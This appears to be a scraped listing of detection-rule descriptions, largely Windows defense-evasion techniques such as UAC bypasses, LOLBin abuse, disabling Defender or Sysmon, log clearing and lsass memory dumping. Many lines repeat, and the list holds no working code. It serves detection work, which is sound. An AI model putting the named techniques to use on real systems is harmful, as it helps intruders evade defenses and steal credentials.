Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
Sponsored by
Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute
Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
Use IE registry to hide a scripts
BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
Uses the .NET InstallUtil.exe application in order to execute image without log
Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.
Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
Deletion of log files is a known anti-forensic technique
Powershell Remove-Item with -Path to delete a file or a folder with “-Recurse”
Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.
Powershell use PassThru option to start in background
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Detects suspicious command line patterns used when rundll32 is used to run JavaScript code
Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion
Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration
Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN
Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system
Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name
Detection of sc.exe utility adding a new service with special permission which hides that service.
Rename as a legitim Sysinternals Suite tools to evade detection
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
utilizes REGSVR32.exe to execute this DLL masquerading as a Image file
Extract data from cab file and hide it in an alternate data stream
Download or Copy file with Extrac32
Extexport.exe loads dll and is execute from other folder the original path
Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
Performs execution of specified file, can be used as a defensive evasion.
Execute C# code with the Build Provider and proper folder structure in place.
Detects shell32.dll executing a DLL in a suspicious directory
Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal
suspicious command line to remove exe or dll
Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
Detects using WorkFolders.exe to execute an arbitrary control.exe
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
Attempts to detect registry events for common NetWire key HKCU\Software\NetWire
Detects the deletion of registry keys containing the MSTSC connection history
Detects disabling Windows Defender Real-Time Protection by modifying registry
Detects when a user disables the Windows Firewall via a Profile to help evade defense.
Detects the deletion of a prefetch file (AntiForensic)
Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll
Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
Detects the pattern of UAC Bypass using computerdefaults.exe (UACMe 59)
Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit
Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.
Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32
Detects indicators of a UAC bypass method by mocking directories
This detection uses AzureActivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.
This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.
Detects suspicious Splwow64.exe process without any command line parameters
Detects the pattern of a pipe name as used by the tool EfsPotato
Powerup tool’s Write Hijack DLL exploits DLL hijacking for privilege escalation. In it’s default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).
Detects uses of the SysInternals Procdump utility
Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).
Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
Detects evade to Macie detection.
Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
Detects a regsvr.exe execution that doesn’t contain a DLL in the command line
Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
Detects a suspicious reg.exe invocation that looks as if it would disable an important security service
RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).
Detects the Setting of Windows Defender Exclusions
Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
Detects the modification of the findings on SecurityHub.
Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
Detects the conhost execution as parent process. Can be used to evaded defense mechanism.
Windows Defender logs when the history of detected infections is deleted. Log file will contain the message “Windows Defender Antivirus has removed history of malware and other potentially unwanted software”.
Detects specific process characteristics of Winnti Pipemon malware reported by ESET
Detects user agent and URI paths used by empire agents
Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time
Detects disabling security tools
Detects setting proxy
Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020
Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer
Detects disabling Windows Defender threat protection
Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020
Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048
Detects suspicious network connection by Notepad
Detects a process memory dump performed via ordinal function 24 in comsvcs.dll
Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.
Detects a method that uses Wsreset.exe tool that can be used to reset the Windows Store to bypass UAC
Detects suspicious FromBase64String expressions in command line arguments
Detects suspicious process injection using ZOHO’s dctask64.exe
Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation
Detects AWS Config Service disabling
Detects disabling, deleting and updating of a Trail
Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601)
The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Detects activity mentioned in Operation Wocao report
Detects the execution of a renamed ProcDump executable often used by attackers or malware
See what files are being deleted from flash file systems
Turn off logging locally or remote
Show when private keys are being exported from the device, or when new certificates are installed
Clear command history in network OS which is used for defense evasion
Detects suspicious msiexec process starts in an uncommon directory
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Offensive tradecraft is switching away from using APIs like “CreateRemoteThread”, however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
Detects possible bypass EDR and SIEM via abnormal user account name.
IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services “svchost.exe -k netsvcs” to gain code execution on a remote machine.
Detect download by BITS jobs via PowerShell
Identifies suspicious mshta.exe commands.
Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.
Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
Identifies usage of hh.exe executing recently modified .chm files.
Detect child processes of automatically elevated instances of Microsoft Connection Manager Profile Installer (cmstp.exe).
Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
Execute C# code located in the consoleapp folder
Launch 64-bit shellcode from a debugger script file using cdb.exe.
Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender
Detects execution of of Dxcap.exe
Execute VBscript code that is referenced within the *.bgi file.
Detects defence evasion attempt via odbcconf.exe execution to load DLL
Detects network connections and DNS queries initiated by Regsvr32.exe
Detect changes of syslog daemons configuration files
Detect changes in auditd configuration files
Detects potential malicious modification of the property value of fDenyTSConnections and UserAuthentication to enable remote desktop connections.
Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
Detects WRITE_DAC access to a domain object
Detects removing immutable file attribute.
Detects a file or folder’s permissions being modified.
Detects file and folder permission changes.
Detect possible Sysmon driver unload
The OpenWith.exe executes other binary
The Devtoolslauncher.exe executes other binary
Detects suspicious calls of DLLs in rundll32.dll exports by ordinal
Detects a code page switch in command line or batch scripts to a rare language
Detects all Emotet like process executions that are not covered by the more generic rules
Detects the malicious use of a control panel item
Detects the execution of a renamed PowerShell often used by attackers or malware
Detects a suspicious child process of userinit
Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
Detects the execution of a renamed PsExec often used by attackers or malware
Detects registry keys created in OceanLotus (also known as APT32) attacks
Clear command history in linux which is used for defense evasion.
Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
Detects activity that could be related to Baby Shark malware
Detects svchost hosting RDP termsvcs communicating with the loopback address
Detects a suspicious child process of a Windows shell
Detects the creation of a process from Windows task manager
Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we’re also able to catch cases in which the attacker has renamed the procdump executable.
Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter ’ -ma ’ and ’ -accepteula’ in a single step. This way we’re also able to catch cases in which the attacker has renamed the procdump executable.
Detects a suspicious svchost process start
Detects suspicious process related to rasdial.exe
Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
Detects suspicious process that use escape characters
Detects a suspicious Microsoft certutil execution with sub commands like ‘decode’ sub command, which is sometimes used to decode malicious code with the built-in certutil utility
Detects various anomalies in relation to regsvr32.exe
Detects Base64 encoded Shellcode
Detects Request to amsiInitFailed that can be used to disable AMSI Scanning
Detects execution of executables that can be used to bypass Applocker whitelisting
Detects a ping command that uses a hex encoded IP address
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil
Detects suspicious msiexec process starts with web addresses as parameter
Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report
Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
Detects usage of attrib.exe to hide files from users.
Detects the creation of an executable with a system process name in a suspicious folder
Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location
Detects typical Dridex process patterns
Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll
Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
Detects Malleable OneDrive Profile
Detects Base64 encoded Shellcode
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Detects PowerShell remote thread creation in Rundll32.exe
Detects NetNTLM downgrade attack
Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
Detects a specific tool and export used by EquationGroup
Detects scenarios where system auditing (ie: windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed. Also, it is recommended to turn off “Local Group Policy Object Processing” via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as “gpedit.msc”. Please note, that disabling “Local Group Policy Object Processing” may cause an issue in scenarios of one off specific GPO modifications – however it is recommended to perform these modifications in Active Directory anyways.
Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
Detects a ZxShell start by the called and well-known function name
Detects renaming of file while deletion with SDelete tool.
This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded
Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
Detects backup catalog deletions
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
Detects UAC bypass method using Windows event viewer
Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
Detects Windows PowerShell Web Access
This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN
Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn’t require admin privillege to be written and executed from.
Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
Detects deinstallation of security products using WMIC utility
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc).
Detects Winword.exe loading of custmom dll via /l cmd switch
Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
Detect DLL deletions from Spooler Service driver folder
Detect DLL Load from Spooler Service backup folder
Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.
Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.
Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
Detects when verclsid.exe is used to run COM object via GUID
Detects using SettingSyncHost.exe to run hijacked binary
Application Virtualization Utility is included with Microsoft Office. We are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder or to mark a file as a system file.
Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
Detect scenarios where a potentially unauthorized application or user is modifying the system time.
Attempts to load dismcore.dll after dropping it
Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
Detects Turla ComRAT patterns
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Detects suspicious requests to Telegram API without the usual Telegram User-Agent
Attempting to disable scheduled scanning and other parts of windows defender atp.
Someone try to hide from Sysmon
Someone try to hide from Sysmon
Potential threat actor tampering with Sysmon manifest and eventually disabling it
A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.
A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.
Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model
Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
Detects a service binary running in a suspicious directory
Detects execution of powershell scripts via Runscripthelper.exe
Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
Detects suspicious process related to rundll32 based on arguments
Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
Detects when the registration of a VSS/VDS Provider as a COM+ application.
Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
Detects the PowerShell command lines with special characters
Detects the PowerShell command lines with reversed strings
Detects a suspicious parent of csc.exe, which could by a sign of payload delivery
Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory
Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection
Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
Detects the load of advapi31.dll by a process running in an uncommon folder
Open a handle on the drive volume via the \.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.
Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
Detects renamed ftp.exe, ftp.exe script execution and child processes ran by ftp.exe
Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).
Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
Detects the loading of drivers via ‘SeLoadDriverPrivilege’ required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name
Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion
Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Atbroker executing non-deafualt Assistive Technology applications
Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.
Detects suspicious .NET assembly executions. Could detect using Cobalt Strike’s command execute-assembly.
Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service
Detects extracting of zip file from image file
Detects appending of zip file to image
Detects Possible Squirrel Packages Manager as Lolbin
This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Detects actions that clear the local ShimCache and remove forensic evidence
Shadow Copies deletion using operating systems utilities
Marks a file as a system file using the attrib.exe utility
Detects PowerShell script execution via input stream redirect
Detects PowerShell script execution from Alternate Data Stream (ADS)
This rule detects the execution of Run Once task as configured in the registry
Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Detects suspicious renamed PAExec execution as often used by attackers
Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
Detects renamed jusched.exe used by cobalt group
Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities.
Remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection
Remote registry management using REG utility from non-admin workstation
Detects an attempt to execute code or create service on remote host via winrm.vbs.
Detects actions caused by the RedMimicry Winnti playbook
Detects actions caused by the RedMimicry Winnti playbook
Detects actions caused by the RedMimicry Winnti playbook
Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory
Detects changes to RDP terminal service sensitive settings
Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
Raw disk access using illegitimate tools, possible defence evasion
Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
Attackers can use explorer.exe for evading defense mechanisms
Detects process memory dump via comsvcs.dll and rundll32
Detects attackers attempting to disable Windows Defender using Powershell
Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Detects suspicious encoded character syntax often used for defense evasion
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
Detects requests to disable Microsoft Defender features using PowerShell commands
Detects base64 encoded PowerShell code that modifies Windows Defender
Detects PowerShell called from an executable by the version mismatch method
Detects, possibly, malicious unauthorized usage of bcdedit.exe
Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz
Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.
Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)
Search for usage of reg or Powershell by non-priveleged users to modify service configuration in registry
Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware
Detects netsh commands that configure a port forwarding of port 3389 used for RDP
Allow Incoming Connections by Port or Application on Windows Firewall
Detects netsh commands that configure a port forwarding (PortProxy)
Adversaries may modify system firewalls in order to bypass controls limiting network usage
Detects a suspicious child process of a mshta.exe process
Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.
Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe’s, msi, msix files later.
BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded
Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
This rule detects a suspicious crash of the Microsoft Malware Protection Engine
Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection
Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
There is an option for a MS VS Just-In-Time Debugger “vsjitdebugger.exe” to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.
Detects the creation of a named pipe used by known APT malware
COM interface (EditionUpgradeManager) that is not used by standard executables.
Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detects Obfuscated Powershell via use MSHTA in Scripts
Detects Obfuscated Powershell via use MSHTA in Scripts
Detects Obfuscated Powershell via use MSHTA in Scripts
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detects Obfuscated Powershell via Stdin in Scripts
Detects Obfuscated Powershell via Stdin in Scripts
Detects Obfuscated Powershell via Stdin in Scripts
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detects Obfuscated use of Environment Variables to execute PowerShell
Detects Obfuscated use of Environment Variables to execute PowerShell
Detects Obfuscated use of Environment Variables to execute PowerShell
Detects Obfuscated use of stdin to execute PowerShell
Detects Obfuscated use of stdin to execute PowerShell
Detects Obfuscated use of stdin to execute PowerShell
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detects Obfuscated use of Clip.exe to execute PowerShell
Detects Obfuscated use of Clip.exe to execute PowerShell
